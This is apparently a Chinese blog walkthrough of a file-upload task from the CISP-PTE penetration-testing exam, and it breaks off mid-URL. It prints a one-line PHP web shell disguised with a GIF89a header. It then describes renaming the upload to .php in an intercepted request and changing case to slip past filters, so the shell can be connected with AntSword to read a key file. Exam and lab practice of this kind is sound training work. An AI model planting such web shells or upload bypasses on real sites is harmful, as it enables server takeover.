CISP-PTE实操练习讲解
前言
这次给大家讲解一下考试的各个题型
一、文件上传
这道题就很简单,上传一个木马进行蚁剑连接就可以了
![在这里插入图片描述](https://img-blog.csdnimg.cn/fe4169375422467987956c345fa8fa40.png)
答案就在key.php文件中
![在这里插入图片描述](https://img-blog.csdnimg.cn/9431017ec0da4fa39ea0a8ec04c2f786.png)
我们创建一个文件,注入一段一句话木马,改成zhi.jpg文件上传
GIF89a?
<?php @eval($_POST['chopper']); ?>
写GIF89a?这个的目的是为了证明是图片文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/6596837f552648b4970d2b8b2d7d02fa.png)
上传之后进行抓包重发即可,但是要修改后缀名为.php,且要修改为大小写绕过,就是将eval改为Eval就可以了
![在这里插入图片描述](https://img-blog.csdnimg.cn/79ae8929937343d587be74ec9074ff18.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e1d9702ba208473d9ea2af21814b2aee.png)
我们打开图片看看是否可不可以打开
http://150.158.27.164:82/zhi.p